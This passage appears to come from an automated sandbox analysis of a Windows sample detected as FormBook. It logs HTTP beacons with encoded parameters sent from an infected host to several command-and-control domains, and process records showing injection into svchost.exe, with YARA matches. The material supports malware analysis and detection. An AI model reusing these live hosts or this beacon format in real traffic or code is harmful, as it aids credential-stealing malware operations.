                                                                                                              Data Ascii: Q2_4=5k4Kdr+CZc7NW/NM8iJB8YAuUi6EV5pH0lT9rwhKoUq40k/hRUSxrNPP8jJ7lxZj0Mpp9fpZdFBGhndvv/Q7wOylXWmv3rSD8fqfaAPa2sFOVRkEvm0SiRc2onJvk/hvSl3lS+fKxHt527Z1ckEw1i9MfnCTSGl3IqlR2bXDK6TZditwnY4tkpraa4JSTSpLUw==
Nov 5, 2024 15:38:09.699775934 CET | 643 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:38:09 GMT
                                                                                                              Server: Apache
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip
                                                                                                              Content-Length: 358
                                                                                                              Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port
63 | 192.168.11.20 | 49804 | 119.18.54.27 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:38:12.179430962 CET | 746 | OUT | POST /44hl/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.wonders8.live
                                                                                                              Origin: http://www.wonders8.live
                                                                                                              Referer: http://www.wonders8.live/44hl/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Ascii: Q2_4=5k4Kdr+CZc7NMclM9C1BsIAtKS6EPJpD0kv9rxlaoi640FPhAlSxqNPPkzJ+rRZo0Mlh9dtZdElGhlFvvM48weyra2mtzrSD8fqfaDz02sdOVBUEpH0dsxc1iHJvzvhrSl3bS6+RxEZ525B1cxozuy9OVHDAfmQdQbta3YH7PPD7VU8q6qMJn63oeIw6RQoQJ0A0WdEJinFcIZD3nI3zftU=
Nov 5, 2024 15:38:12.661990881 CET | 643 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:38:12 GMT
                                                                                                              Server: Apache
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip
                                                                                                              Content-Length: 358
                                                                                                              Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port
64 | 192.168.11.20 | 49805 | 119.18.54.27 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:38:15.146502972 CET | 2578 | OUT | POST /44hl/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.wonders8.live
                                                                                                              Origin: http://www.wonders8.live
                                                                                                              Referer: http://www.wonders8.live/44hl/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Nov 5, 2024 15:38:15.146568060 CET | 5317 | OUT
Nov 5, 2024 15:38:15.584599972 CET | 643 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:38:15 GMT
                                                                                                              Server: Apache
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip
                                                                                                              Content-Length: 358
                                                                                                              Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port
65 | 192.168.11.20 | 49806 | 119.18.54.27 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:38:18.127055883 CET | 457 | OUT | GET /44hl/?Q2_4=0mQqee+UGJnUA/Yx1BcY9bAABUibbqUVx0XTpT1xrmayiD/fNEmP8Z3r8TZ3vglxtN5riIpUZVEdwgctiqwj4JSuSDuD97XK84LsZQ3P19o3XG1/uWMy0C8=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.wonders8.live
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Nov 5, 2024 15:38:18.595443964 CET | 844 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:38:18 GMT
                                                                                                              Server: Apache
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              Content-Length: 583
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Type: text/html
                                                                                                              Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
66 | 192.168.11.20 | 49807 | 195.110.124.133 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:38:31.995176077 CET | 735 | OUT | POST /oy0l/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.nidedabeille.net
                                                                                                              Origin: http://www.nidedabeille.net
                                                                                                              Referer: http://www.nidedabeille.net/oy0l/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Ascii: Q2_4=ie+Q6zlFBhufIDdLhOI2xndL0Z654lMU8Y4HT85afj3afMS54RnGhRfhToH9otlLuVznXCI80qSyDpkD0oDQM0/1PtE+QVu0pDO33Nf6n0iIqGCTNOFtAY9rEEyJydAw6VxlY1rWb2APJSOv67YLBo2TcPeSYw3HlLh6k/Kah9LZqARf3FNJFFCuIVnfJ7NwKA==
Nov 5, 2024 15:38:32.210288048 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:38:32 GMT
                                                                                                              Server: Apache
                                                                                                              Content-Length: 203
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /oy0l/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
67 | 192.168.11.20 | 49808 | 195.110.124.133 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:38:34.753774881 CET | 755 | OUT | POST /oy0l/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.nidedabeille.net
                                                                                                              Origin: http://www.nidedabeille.net
                                                                                                              Referer: http://www.nidedabeille.net/oy0l/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Ascii: Q2_4=ie+Q6zlFBhufIjNLsNg24ndK45653FMI8Y0HT98XfQTacuK57TPGmRfhYIHCnNl6uVvVXGI80qWyDo4D1eLTNk/zENE8e1u0pDO33J3An0qIt2yTOstsco9qDEyJ59B56VwGY0Gzb0IPJQWv5qYIb43YTvfuXQyAkPV5vuiY5uT8vWAFq35tGWecMle3L5MrXC3QlUUlcJZK7yGzflRbhG4=
Nov 5, 2024 15:38:34.973217010 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:38:34 GMT
                                                                                                              Server: Apache
                                                                                                              Content-Length: 203
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /oy0l/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
68 | 192.168.11.20 | 49809 | 195.110.124.133 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:38:37.492533922 CET | 7904 | OUT | POST /oy0l/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.nidedabeille.net
                                                                                                              Origin: http://www.nidedabeille.net
                                                                                                              Referer: http://www.nidedabeille.net/oy0l/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Nov 5, 2024 15:38:37.704250097 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:38:37 GMT
                                                                                                              Server: Apache
                                                                                                              Content-Length: 203
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /oy0l/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
69 | 192.168.11.20 | 49810 | 195.110.124.133 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:38:40.225492954 CET | 460 | OUT | GET /oy0l/?uXP=1HX8&Q2_4=vcWw5DdjdQnkJmRMu9Bv0nYhxIjg8XNP87kLKcEwcjL/VJXYlRnLhwXYdIbeiM5Wp1LHJGQmwLmzd8N63pnOImbiL9MWYGLhlQi4+Y3hzWOb/gf9Ze4XcY0= HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.nidedabeille.net
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Nov 5, 2024 15:38:40.483453989 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:38:40 GMT
                                                                                                              Server: Apache
                                                                                                              Content-Length: 203
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /oy0l/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
70 | 192.168.11.20 | 49811 | 203.161.41.204 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:38:45.678103924 CET | 723 | OUT | POST /3qrm/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.brunvox.site
                                                                                                              Origin: http://www.brunvox.site
                                                                                                              Referer: http://www.brunvox.site/3qrm/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Ascii: Q2_4=gw2m3M8X73DGV2nS3zENawGsJB29ypkvwzTF0hwyjjvlUo1GA14mPweKJEA8o6Ge7Zc2rq3yA893kQxObEWjot769S/AJa3/yZrlsHp1GNjgNLHScOxgxsTjaQ34IkvUgsYLIFbi4/NMoxUbI27P65ce6I4RKMVFfj4vbHkn6DungwgLrtA2GfMN6raA0384zg==
Nov 5, 2024 15:38:45.871273994 CET | 896 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:38:45 GMT
                                                                                                              Server: Apache
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Content-Length: 690
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
71 | 192.168.11.20 | 49812 | 203.161.41.204 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:38:48.392868996 CET | 743 | OUT | POST /3qrm/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.brunvox.site
                                                                                                              Origin: http://www.brunvox.site
                                                                                                              Referer: http://www.brunvox.site/3qrm/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Ascii: Q2_4=gw2m3M8X73DGUXXSxgsNSwGjMB294JkrwzfF0g1vjR7lUJFGHE4mMweKBkA5naHc7ZQQrrbyA853kVVOa3Ogo9780y/CR63/yZrlsH8iGLLgO4PScvxnvcT8dQ34f0vQgsZcIA7Y491MoxEbIn7Mx5cc0o5japI5QgoUYXp+yxC+oGxR2f0SFMQ/+bjo219juiri/+8nFUVlwJqO92i+BR4=
Nov 5, 2024 15:38:48.576363087 CET | 896 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:38:48 GMT
                                                                                                              Server: Apache
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Content-Length: 690
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
72 | 192.168.11.20 | 49813 | 203.161.41.204 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:38:51.098264933 CET | 2578 | OUT | POST /3qrm/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.brunvox.site
                                                                                                              Origin: http://www.brunvox.site
                                                                                                              Referer: http://www.brunvox.site/3qrm/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Nov 5, 2024 15:38:51.290591955 CET | 896 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:38:51 GMT
                                                                                                              Server: Apache
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Content-Length: 690
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
73 | 192.168.11.20 | 49814 | 203.161.41.204 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:38:53.816171885 CET | 456 | OUT | GET /3qrm/?Q2_4=tyeG08MV0U64WH6unwcOXR2sJCf/xqZR+j/9sSFSjjXbCPJ8dUZ7AUStEW8oibqh5p8I6M3vE8IgylEGfxaCpffC+Ti1QKudju6yjlF7VN/fdeOaTvtkuuM=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.brunvox.site
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Nov 5, 2024 15:38:54.002469063 CET | 911 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:38:53 GMT
                                                                                                              Server: Apache
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Content-Length: 690
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
74 | 192.168.11.20 | 49815 | 68.65.122.222 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:38:59.203851938 CET | 717 | OUT | POST /gqtu/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.osi.garden
                                                                                                              Origin: http://www.osi.garden
                                                                                                              Referer: http://www.osi.garden/gqtu/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Nov 5, 2024 15:38:59.383042097 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                              keep-alive: timeout=5, max=100
                                                                                                              content-type: text/html
                                                                                                              transfer-encoding: chunked
                                                                                                              content-encoding: gzip
                                                                                                              vary: Accept-Encoding
                                                                                                              date: Tue, 05 Nov 2024 14:38:59 GMT
                                                                                                              server: LiteSpeed
                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
75 | 192.168.11.20 | 49816 | 68.65.122.222 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:39:01.923854113 CET | 737 | OUT | POST /gqtu/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.osi.garden
                                                                                                              Origin: http://www.osi.garden
                                                                                                              Referer: http://www.osi.garden/gqtu/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Nov 5, 2024 15:39:02.104667902 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                              keep-alive: timeout=5, max=100
                                                                                                              content-type: text/html
                                                                                                              transfer-encoding: chunked
                                                                                                              content-encoding: gzip
                                                                                                              vary: Accept-Encoding
                                                                                                              date: Tue, 05 Nov 2024 14:39:02 GMT
                                                                                                              server: LiteSpeed
                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                              connection: close


                                                                                                              Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                                                                              76          192.168.11.20  49817        68.65.122.222   80
                                                                                                              Timestamp  Bytes transferred  Direction  Data
                                                                                                              Nov 5, 2024 15:39:04.640604973 CET  1289  OUT  POST /gqtu/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.osi.garden
                                                                                                              Origin: http://www.osi.garden
                                                                                                              Referer: http://www.osi.garden/gqtu/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:39:04.830723047 CET  1289  IN  HTTP/1.1 404 Not Found
                                                                                                              keep-alive: timeout=5, max=100
                                                                                                              content-type: text/html
                                                                                                              transfer-encoding: chunked
                                                                                                              content-encoding: gzip
                                                                                                              vary: Accept-Encoding
                                                                                                              date: Tue, 05 Nov 2024 14:39:04 GMT
                                                                                                              server: LiteSpeed
                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                              connection: close


                                                                                                              Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                                                                              77          192.168.11.20  49818        68.65.122.222   80
                                                                                                              Timestamp  Bytes transferred  Direction  Data
                                                                                                              Nov 5, 2024 15:39:07.355928898 CET  454  OUT  GET /gqtu/?uXP=1HX8&Q2_4=f6Wh19Zbj3f0KGUwZR2TDfnh8ZC1kt4m9SH2+p3LnlYuxzS1qi5wc2xrbNMUplnXpMrttmRXmQTtzIwx74OUI7QZZXrSykXx07R8xuG/LilMEmUkiLjEEHk= HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.osi.garden
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:39:07.534816980 CET  1289  IN  HTTP/1.1 404 Not Found
                                                                                                              keep-alive: timeout=5, max=100
                                                                                                              content-type: text/html
                                                                                                              transfer-encoding: chunked
                                                                                                              date: Tue, 05 Nov 2024 14:39:07 GMT
                                                                                                              server: LiteSpeed
                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                              connection: close


                                                                                                              Target ID:0
                                                                                                              Start time:09:32:48
                                                                                                              Start date:05/11/2024
                                                                                                              Path:C:\Users\user\Desktop\p4rsJEIb7k.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\p4rsJEIb7k.exe"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:1'335'565 bytes
                                                                                                              MD5 hash:159AFC06A66A86F332BE92F52963B09E
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:1
                                                                                                              Start time:09:32:50
                                                                                                              Start date:05/11/2024
                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\p4rsJEIb7k.exe"
                                                                                                              Imagebase:0x1a0000
                                                                                                              File size:47'016 bytes
                                                                                                              MD5 hash:B7C999040D80E5BF87886D70D992C51E
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.4812307431.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.4812307431.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.4813936087.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.4813936087.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.4815096590.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.4815096590.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              Reputation:moderate
                                                                                                              Has exited:true

                                                                                                              Target ID:2
                                                                                                              Start time:09:33:31
                                                                                                              Start date:05/11/2024
                                                                                                              Path:C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe"
                                                                                                              Imagebase:0xab0000
                                                                                                              File size:140'800 bytes
                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
